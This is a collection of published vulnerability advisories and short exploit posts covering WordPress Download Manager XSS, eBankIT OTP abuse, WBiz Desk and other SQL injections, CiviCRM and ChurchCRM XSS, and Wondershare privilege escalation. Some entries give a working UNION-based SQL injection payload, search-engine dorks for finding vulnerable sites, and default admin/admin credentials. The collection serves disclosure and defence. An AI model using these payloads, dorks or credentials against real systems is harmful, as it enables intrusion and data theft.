<pre><code>W3 Eden recently patched an Authenticated Stored Cross-Site Scripting vulnerability in Download Manager.<br /><br />On April 25, 2023, our Wordfence Threat Intelligence team identified and began the responsible disclosure process for a stored Cross-Site Scripting (XSS) vulnerability in W3 Eden’s Download Manager plugin, which is actively installed on more than 100,000 WordPress websites, making it one of the most popular download management plugins. The vulnerability enables threat actors with contributor-level permissions or higher to inject malicious web scripts into pages using the plugin’s shortcode.<br /><br />All Wordfence Premium, Wordfence Care, and Wordfence Response customers, as well as those still using the free version of our plugin, are protected against any exploits targeting this vulnerability by the Wordfence firewall’s built-in Cross-Site Scripting protection.<br /><br />We contacted W3 Eden on April 25, 2023, and promptly received a response. After providing full disclosure details, the developer released a patch on May 1, 2023. We would like to commend the W3 Eden development team for their prompt response and timely patch.<br /><br />We urge users to update their sites with the latest patched version of Download Manager, version 3.2.71 at the time of this writing, as soon as possible.<br /><br />READ THIS POST ON THE BLOG<br /><br />Vulnerability Summary from Wordfence Intelligence<br /><br />Description: Download Manager <= 3.2.70 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode <br /><br />Affected Plugin: Download Manager<br /><br />Plugin Slug: download-manager<br /><br />Affected Versions: <= 3.2.70<br /><br />CVE ID: CVE-2023-2305<br /><br />CVSS Score: 6.4 (Medium)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br /><br />Researcher/s: Lana Codes<br /><br />Fully Patched Version: 3.2.71<br /><br />The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘wpdm_members’, ‘wpdm_login_form’, ‘wpdm_reg_form’ shortcodes in versions up to, and including, 3.2.70 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.<br /><br />Technical Analysis<br /><br />Download Manager is a plugin designed to allow WordPress users to manage, track and control file downloads. It provides a shortcode ([wpdm_members]) that lists the authors and the number of files they have added when added to a WordPress page. However, insecure implementation of the plugin’s shortcode functionality allows for the injection of arbitrary web scripts into these pages. Examining the code reveals that the members method in the User class did not adequately sanitize the user-supplied ‘sid’ input, and then loads the members.php view file, where it also did not adequately escape ‘sid’ output. This makes it possible to inject attribute-based Cross-Site Scripting payloads via the ‘sid’ attribute.<br /><br />[View the Code Snippets on the Blog] <br /><br />There are two other shortcodes, a login form shortcode ([wpdm_login_form]) and a registration form shortcode ([wpdm_reg_form]), that add forms to a WordPress site. However, the insecure implementation of these two shortcode functions, similar to the previous example, also allows arbitrary web scripts to be inserted into these pages. Examining the code reveals that the functions of both forms do not adequately sanitize the user-supplied ‘logo’ input, and in the view files these ‘logo’ outputs are not adequately escaped.<br /><br />[View the Code Snippets on the Blog] <br /><br />These make it possible for threat actors to carry out stored XSS attacks. Once a script is injected into a page or post, it will execute each time a user accesses the affected page. While this vulnerability does require that a trusted contributor account is compromised, or a user be able to register as a contributor, successful threat actors could steal sensitive information, manipulate site content, inject administrative users, edit files, or redirect users to malicious websites which are all severe consequences.<br /><br />Disclosure Timeline<br /><br />April 25, 2023 – Wordfence Threat Intelligence team discovers the stored XSS vulnerability in Download Manager and initiates responsible disclosure.<br /><br />April 27, 2023 – We get in touch with the development team at W3 Eden and send full disclosure details.<br /><br />May 1, 2023 – The fully patched version, 3.2.71, is released.<br /><br />May 3, 2023 – The vendor notified Wordfence that they released the patch.<br /><br />May 3, 2023 – Wordfence confirms the fix addresses the vulnerability.<br /><br />Conclusion<br /><br />In this blog post, we have detailed a stored XSS vulnerability within the Download Manager plugin affecting versions 3.2.70 and earlier. This vulnerability allows authenticated threat actors with contributor-level permissions or higher to inject malicious web scripts into pages that execute when a user accesses an affected page. The vulnerability has been fully addressed in version 3.2.71 of the plugin.<br /><br />We encourage WordPress users to verify that their sites are updated to the latest patched version of Download Manager.<br /><br />All Wordfence users, including those running Wordfence Premium, Wordfence Care, and Wordfence Response, as well as sites still running the free version of Wordfence, are fully protected against this vulnerability.<br /><br />If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.<br /><br />For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.<br /></code></pre>
<pre><code>CVE-2023-33291<br /><br />[Description]<br />In eBankIT 6, the public endpoints /public/token/Email/generate and<br />/public/token/SMS/generate allow generation of OTP messages to any email<br />address or phone number without validation.<br />------------------------------------------<br /><br />[Additional Information]<br />The cookies in the request are not needed, they can be empty.<br /><br />------------------------------------------<br /><br />[Vulnerability Type]<br />Insecure Permissions<br /><br />------------------------------------------<br /><br />[Vendor of Product]<br />eBankIT<br /><br />------------------------------------------<br /><br />[Affected Product Code Base]<br />eBankIT - Version 6<br /><br />------------------------------------------<br /><br />[Affected Component]<br />Public API Endpoint: /public/token/Email/generate<br />Public API Endpoint: /public/token/SMS/generate<br /><br />------------------------------------------<br /><br />[Attack Type]<br />Remote<br /><br />------------------------------------------<br /><br /> [Impact Denial of Service]<br /> true<br /><br />------------------------------------------<br />[CVE Impact Other]<br />Because these endpoints are public, and the values of the cookies are not<br />required, a threat actor could potentially leverage this functionality to<br />create a more realistic social engineering scenario that could potentially<br />affect clients.<br /><br />------------------------------------------<br />[Attack Vectors]<br />To exploit this vulnerability, an attacker must intercept the request to<br />the api public endpoint: /public/token/Email/generate or<br />/public/token/SMS/generate. The attacker can modify the parameters to<br />choose which email or phone number the OTP would go to. This request can be<br />used without any type of restriction.<br /><br /> ------------------------------------------<br /><br /> [Discoverer]<br />Steeven Rodríguez<br /></code></pre>
<pre><code>[#] Exploit Title: WBiz Desk 1.2 - SQL Injection<br />[#] Exploit Date: May 12, 2023.<br />[#] CVSS 3.1: 6.4 (Medium)<br />[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N<br />[#] Tactic: Initial Access (TA0001)<br />[#] Technique: Exploit Public-Facing Application (T1190)<br />[#] Application Name: WBiz Desk<br />[#] Application Version: 1.2<br />[#] Link: https://www.codester.com/items/5641/wbiz-desk-simple-and-effective-help-desk-system<br /><br /><br />[#] Author: h4ck3r - Faisal Albuloushi<br />[#] Contact: SQL@hotmail.co.uk<br />[#] Blog: https://www.0wl.tech<br /><br /><br />[#] 3xploit:<br /><br />[path]//ticket.php?tk=[SQL Injection]<br /><br /><br />[#] 3xample:<br /><br />[path]/ticket.php?tk=83' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x534d6e485a74664750746b7553746a556b414e7064624b7672626b42454c74674f5669436a466a53,0x71626b6b71),NULL,NULL,NULL-- -<br /><br /><br />[#] Notes:<br />- The vulnerability requires a non-admin privilege (normal) user to be exploited.<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : hyiplab V2.1 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(64-bit) | <br />| # Vendor : https://appdevs.net/ | <br />| # Dork : "Every balance subtracting transactions need OTP verification so You can feel safe about your funds." |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /> <br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin & pass= admin<br /><br />[+] https://127.0.0.1/hyiplab/admin/dashboard<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>===========================================================================================<br />| # Title : Esg 2.5 Sql Injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://www.creatop.com.tw/esg | <br />| # Dork : Powered by CREATOP |<br />===========================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : news.php?tayear=2023<br /><br />[+] http://www.127.0.0.1/vitaltec.com.tw/en/news/news.php?tayear=2023 <==== inject here<br /><br />[+] Panel : /admin/login.php<br /><br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Code Bakers v1.0 SQL injection Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | <br />| # Vendor : https://www.codebakers.co.uk/ | <br />| # Dork : "dishes.php?res_id=" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use payload : /dishes.php?res_id= <===== inject here <br /><br />[+] https://127.0.0.1/talwarabazaar.com/dishes.php?res_id=5<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code># Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)<br /># Date: 2023-02-02<br /># Exploit Author: Andrea Intilangelo<br /># Vendor Homepage: https://civicrm.org<br /># Software Link: https://civicrm.org/download<br /># Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)<br /># Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)<br /># CVE: CVE-2023-25440 / Vendor Security Advisory: CIVI-SA-2023-05<br /><br /><br />Description:<br /><br />A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows attacker to execute arbitrary web<br />scripts or HTML.<br /><br />Injecting persistent javascript code inside the "Add Contact" function while creating a contact, in first/second name<br />field, it will be triggered once page gets loaded.<br /><br /><br />Steps to reproduce:<br /><br />- Quick Add contact to CiviCRM,<br />- Insert a payload PoC inside the field(s)<br />- Click on 'Add contact'.<br /><br />If a user visits the dashboard, as well as "Recently added" box, the javascript code will be rendered.<br /><br /><br />Timeline:<br /><br />2023-01-29: Vulnerability discovered<br />2023-02-02: Request for CVE reservation<br />2023-02-04: Vendor contacted<br />2023-02-06: Vendor replies, acknowledgments and coordinating for advisory<br />2023-02-14: Vendor discloses Security advisory and credits, internal id: CIVI-SA-2023-05<br />2023-02-15: Vendor Security Advisory publication on https://civicrm.org/advisory/civi-sa-2023-05-quick-add-widget<br />2023-04-27: Assigned CVE number: CVE-2023-25440<br />2023-05-18: CVE publication / disclosure<br /></code></pre>
<pre><code># Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)<br /># Date: 2023-04-17<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: http://churchcrm.io/<br /># Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4<br /># Version: 4.5.4<br /># Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53<br /># CVE: CVE-2023-31699<br /><br />Steps to Reproduce:<br /><br />1. At first login your admin panel.<br />2. Then click "Admin" menu and click "CSV Import" and you will get CSV file<br />uploder option.<br />3. now insert xss payload in jpg file using exiftool or from image<br />properties and then upload the jpg file.<br />4. you will see XSS pop up.<br /></code></pre>
<pre><code>Vendor Name: MobileTrans<br />Product Name: MobileTrans<br />Vendor Home Page: https://mobiletrans.wondershare.com/<br />Affected Version(s): MobileTrans version 4.0.11<br />Vulnerability Type: Weak Service Permissions (CWE-276)<br />CVE Reference: CVE-2023-31748<br />Security Researcher: Thurein Soe<br /><br />Vulnerability description:<br />MobileTrans is World 1 mobile-to-mobile file transfer<br />application.MobileTrans version 4.0.11 was being suffered a weak service<br />permission vulnerability that allows a normal window user to elevate to<br />local admin. The "ElevationService" service name was installed, while the<br />MobileTrans version 4.0.11 was installed in the window option system. The<br />service "ElevationService" allows the local user to elevate to the local<br />admin. Effectively, the local user is able to elevate to local admin.<br /><br />C:\Users\HninKayThayar\Desktop>sc qc ElevationService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: ElevationService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files<br />(x86)\Wondershare\MobileTrans\ElevationService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Wondershare Driver Install Service help<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files<br />(x86)\Wondershare\MobileTrans\ElevationService.exe"<br />C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe<br />Everyone:(ID)F<br /> NT<br />AUTHORITY\SYSTEM:(ID)F<br /><br />BUILTIN\Administrators:(ID)F<br /><br />BUILTIN\Users:(ID)R<br /><br />APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R<br /><br />APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R<br /></code></pre>
<pre><code>Vendor Name: Filmora<br />Product Name: Filmora 12 version ( Build 1.0.0.7 )<br />Vendor Home Page: https://filmora.wondershare.com/<br />Affected Version(s): Filmora 12 version (Build 12.2.1.2088)<br />Vulnerability Type: Unquoted Service Path Vulnerability (CWE-428)<br />CVE Reference: CVE-2023-31747<br />Security Researcher: Thurein Soe<br /><br /><br /><br />Vulnerability description:<br />Filmora is professional video editing software. Wondershare NativePush<br />Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088) Wondershare<br />NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The<br />service name "NativePushService" was vulnerable to unquoted service paths<br />vulnerability which led to full local privilege escalation in the affected<br />system as the service "NativePushService" was running as a system<br />privilege. Effectively, the local user is able to elevate to local admin.<br /><br />C:\>sc qc NativePushService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: NativePushService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME :<br />C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare<br />NativePush\WsNativePushService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Wondershare Native Push Service<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\>cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare<br />NativePush\WsNativePushService.exe"<br /><br />C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare<br />NativePush\WsNativePushService.exe<br /><br />BUILTIN\Users:(ID)F<br /><br /> NT AUTHORITY\SYSTEM:(ID)F<br /><br /> BUILTIN\Administrators:(ID)F<br /><br /> HNINKAYTHAYAR\HninKayThayar:(ID)F<br /></code></pre>